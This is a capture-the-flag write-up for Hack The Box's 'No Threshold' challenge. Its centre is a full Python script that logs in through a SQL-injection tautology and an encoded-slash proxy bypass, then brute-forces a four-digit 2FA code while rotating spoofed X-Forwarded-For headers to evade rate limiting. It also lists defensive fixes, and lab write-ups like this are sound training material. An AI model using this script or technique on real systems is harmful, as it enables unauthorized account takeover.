
HackTheBox No Threshold Writeup

A writeup of the No Threshold Challenge on Hack The Box. This medium-level Challenge is about brute-forcing a four-digit 2FA code behind a rate limit that trusts the client-supplied X-Forwarded-For header; the script below first logs in through a SQL injection and then enumerates the code.

https://app.hackthebox.com/challenges/570

Description

Prepare for the finest magic products out there. However, please be aware that we’ve implemented a specialized protective spell within our web application to guard against any black magic aimed at our web shop.🔮🎩

Exploitation

import concurrent.futures
import requests
import socket
import random
import sys
import os

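class TwoFactorCracker:
    """Scripted solution for the No Threshold lab: log in, then try every 4-digit 2FA code.

    Each step relies on a server-side weakness that is visible in the requests
    this class sends: the login accepts a SQL-injection tautology as the
    username, the login URL is reached through an encoded-slash path prefix,
    and the ``X-Forwarded-For`` value chosen by the client changes every 20
    attempts. The matching controls on the defending side are parameterized
    queries, an attempt limit keyed on the account or session instead of a
    client-supplied header, and a proxy that overwrites ``X-Forwarded-For``
    rather than passing the client's value through.
    """

    def __init__(self, url):
        """Remember the base URL and create the shared HTTP session.

        Args:
            url: Base URL of the lab instance (``http://host:port``), without
                a trailing slash; paths are appended to it directly.
        """
        self.url = url
        # A Session keeps cookies between requests, so whatever the login step
        # sets is sent again with every 2FA submission.
        self.session = requests.Session()
        # Number of 2FA requests that received a response (any status code).
        self.count = 0

    def check_code(self, code, ip):
        """Submit one candidate 2FA code and return it with the response.

        Args:
            code: Candidate code as an integer; it is zero-padded to 4 digits.
            ip: Value placed in the ``X-Forwarded-For`` request header.

        Returns:
            ``(code_str, response)``; ``response`` is ``None`` when the
            request raised (timeout, connection error, ...).
        """
        code_str = f'{code:04d}'
        verify_url = f'{self.url}/auth/verify-2fa'
        headers = {
            'Host': self.url.split('//')[1].split('/')[0],
            'Referer': verify_url,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': self.url,
            # Client-chosen value. A rate limit keyed on this header counts
            # attempts per header value, not per real client.
            'X-Forwarded-For': ip
        }
        try:
            response = self.session.post(
                verify_url,
                data={'2fa-code': code_str},
                headers=headers,
                timeout=5
            )
        except Exception:
            # Best effort: a failed request is reported as "no response".
            return code_str, None
        # NOTE: called from worker threads; `+=` is not atomic, so the
        # progress figure printed by crack() is approximate.
        self.count += 1
        return code_str, response

    def spoof_ips(self):
        """Yield an endless stream of random dotted-quad strings.

        The values are only ever used as ``X-Forwarded-For`` header text; the
        source address of the TCP connection is not affected.
        """
        while True:
            yield f"{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}"

    def crack(self):
        """Run the login step, then submit codes 0000-9999 from a thread pool.

        Returns:
            ``True`` when a response body contains ``"flag"``; ``False`` when
            the login step fails, a 403 is received, or no code matches.
        """
        if not self._initial_exploit():
            return False
        ips = self.spoof_ips()
        with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
            futures = []
            current_ip = next(ips)
            for i in range(10000):
                # A new header value every 20 codes - presumably chosen to
                # stay under the lab's per-address attempt threshold (the
                # threshold itself is not shown on this page).
                if i % 20 == 0:
                    current_ip = next(ips)
                futures.append(executor.submit(self.check_code, i, current_ip))
            for future in concurrent.futures.as_completed(futures):
                code_str, response = future.result()
                print(f"\r\033[2KCompleted: {self.count}/10000", end='', flush=True)
                if response and "flag" in response.text:
                    print(f"\nSuccess: {code_str}")
                    print(response.text)
                    return True
                # A 403 is treated as the server having blocked the run.
                if response and response.status_code == 403:
                    print("\nAccess denied")
                    return False
        return False

    def _initial_exploit(self):
        """Post the login form and report whether the server answered 200.

        The username is a SQL-injection tautology, which can only succeed
        when the login query is assembled by string concatenation. The
        ``/%2f%2f/`` prefix is presumably there so that a front-end path rule
        for ``/auth/login`` does not match while the backend still routes the
        request - the page's summary points at a misconfigured HAProxy;
        confirm against the lab's proxy configuration.

        Returns:
            ``True`` on HTTP 200 (the body is not inspected), ``False`` on any
            other status or when the request fails.
        """
        login_url = f'{self.url}/%2f%2f/auth/login'
        payload = {
            'username': '\' or 1=1 -- -',
            'password': 'pass'
        }
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        try:
            # Same timeout as check_code, so a silent server cannot hang the run.
            login_response = self.session.post(
                login_url, data=payload, headers=headers, timeout=5
            )
        except Exception:
            # Narrowed from a bare `except:` so that KeyboardInterrupt and
            # SystemExit reach the caller instead of being reported as a
            # failed login.
            return False
        return login_response.status_code == 200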

def main():
    """Read ``<ip:port>`` from the command line and run the solver against it.

    Exits with status 1 and a usage line unless exactly one argument is given.
    The target is always addressed over plain ``http://``.
    """
    args = sys.argv
    if len(args) != 2:
        print(f"Usage: {args[0]} <ip:port>")
        sys.exit(1)
    target = f"http://{args[1]}"
    TwoFactorCracker(target).crack()

if __name__ == "__main__":
    # Script entry point: run main() and turn Ctrl-C into a clean message.
    try:
        main()
    except KeyboardInterrupt:
        print("\nProcess interrupted by user. Exiting gracefully...")
        # os._exit ends the process immediately, without running cleanup
        # handlers or waiting for the thread pool started in crack().
        os._exit(0)

Summary

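The No Threshold Challenge on Hack The Box is a medium-level challenge that emphasizes brute-forcing 2FA codes while bypassing rate-limiting restrictions through IP spoofing. The spoofing happens at the HTTP layer only: the connection's source address never changes, just the X-Forwarded-For header value that the application reads as the client IP. Participants exploit a poorly configured HAProxy load balancer by crafting HTTP requests with spoofed X-Forwarded-For headers to circumvent access controls. The script above also depends on a SQL injection in the login form to reach the 2FA step. On the defending side, the corresponding fixes are parameterized queries, a proxy that overwrites X-Forwarded-For instead of forwarding the client's value, and a 2FA attempt limit tied to the account or session rather than to an address. The challenge provides valuable hands-on experience in web exploitation, brute-forcing, and bypassing security thresholds, making it ideal for those with an intermediate understanding of cybersecurity techniques.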

This post is licensed under CC BY 4.0 by the author.